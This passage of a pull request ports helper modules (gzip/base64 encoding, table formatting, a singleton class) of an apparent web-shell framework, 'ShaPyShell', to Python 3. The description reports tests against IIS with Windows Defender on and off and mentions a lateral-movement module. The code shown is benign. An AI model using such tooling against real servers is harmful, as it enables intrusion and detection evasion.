             parsed_response = str(module_exc)
         except Exception:

--- a/utils/Singleton.py
+++ b/utils/Singleton.py
@@ -3,5 +3,5 @@ class Singleton(object):
 
     def __new__(cls, *args, **kwargs):
         if cls not in cls._instances:
-            cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)
+            cls._instances[cls] = super(Singleton, cls).__new__(cls)
         return cls._instances[cls]

--- a/utils/gzip_utils.py
+++ b/utils/gzip_utils.py
@@ -11,5 +11,4 @@ def get_compressed_base64_from_file(path):
 
 
 def get_compressed_base64_from_binary(bin_bytearray_input):
-    print(base64.b64encode(gzip.compress(bin_bytearray_input)).decode())
     return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()

--- a/utils/gzip_utils.py
+++ b/utils/gzip_utils.py
@@ -11,4 +11,5 @@ def get_compressed_base64_from_file(path):
 
 
 def get_compressed_base64_from_binary(bin_bytearray_input):
+    print(base64.b64encode(gzip.compress(bin_bytearray_input)).decode())
     return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()

--- a/utils/gzip_utils.py
+++ b/utils/gzip_utils.py
@@ -1,17 +1,14 @@
-import StringIO
+import io 
 import gzip
 import base64
 
 
 def get_compressed_base64_from_file(path):
-    compressed_stream = StringIO.StringIO()
-    with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed, open(path, 'rb') as infile:
-        compressed.write(infile.read())
-    return base64.b64encode(compressed_stream.getvalue())
+    with open(path, 'rb') as f:
+        read_data = f.read() 
+    return base64.b64encode(gzip.compress(read_data)).decode()
 
 
 def get_compressed_base64_from_binary(bin_bytearray_input):
-    compressed_stream = StringIO.StringIO()
-    with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed:
-        compressed.write(str(bin_bytearray_input))
-    return base64.b64encode(compressed_stream.getvalue())
+    print(base64.b64encode(gzip.compress(bin_bytearray_input)).decode())
+    return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()

--- a/utils/gzip_utils.py
+++ b/utils/gzip_utils.py
@@ -4,6 +4,7 @@ import base64
 
 
 def get_compressed_base64_from_file(path):
+
     with open(path, 'rb') as f:
         read_data = f.read() 
     return base64.b64encode(gzip.compress(read_data)).decode()

--- a/utils/prettify.py
+++ b/utils/prettify.py
@@ -16,19 +16,19 @@ def tablify(data, table_border=True):
         table = prettytable.PrettyTable()
 
         # List outputs.
-        if isinstance(data, (types.ListType, types.TupleType)):
+        if isinstance(data, (list, tuple)):
 
             if len(data) > 0:
 
                 columns_num = 1
-                if isinstance(data[0], (types.ListType, types.TupleType)):
+                if isinstance(data[0], (list, tuple)):
                     columns_num = len(data[0])
 
                 for row in data:
                     if not row:
                         continue
 
-                    if isinstance(row, (types.ListType, types.TupleType)):
+                    if isinstance(row, (list, tuple)):
                         table.add_row(row)
                     else:
                         table.add_row([row])
@@ -38,7 +38,7 @@ def tablify(data, table_border=True):
 
             # Populate the rows
             randomitem = next(data.itervalues())
-            if isinstance(randomitem, (types.ListType, types.TupleType)):
+            if isinstance(randomitem, (list, tuple)):
                 for field in data:
                     table.add_row([field] + data[field])
             else:


### PR DESCRIPTION


Upgrading to Python3 (#10 ) and handling all the byte/string changes to ensure the encryption (XOR and AES) continues to work.

I've successfully tested with Python 3.9.2 (Kali) against IIS 10.0.19041.1 (Windows 10 Pro 21H1 19043.1110). I ran tests with the original ShaPyShell (Python 2.7) to compare results with my changes as well as with Windows Defender both enabled and disabled. The usage seems to be identical now between this version and the older 2.7 version.  

All modules were tested and function as expected except for lateral_wmi due to testing limitations. 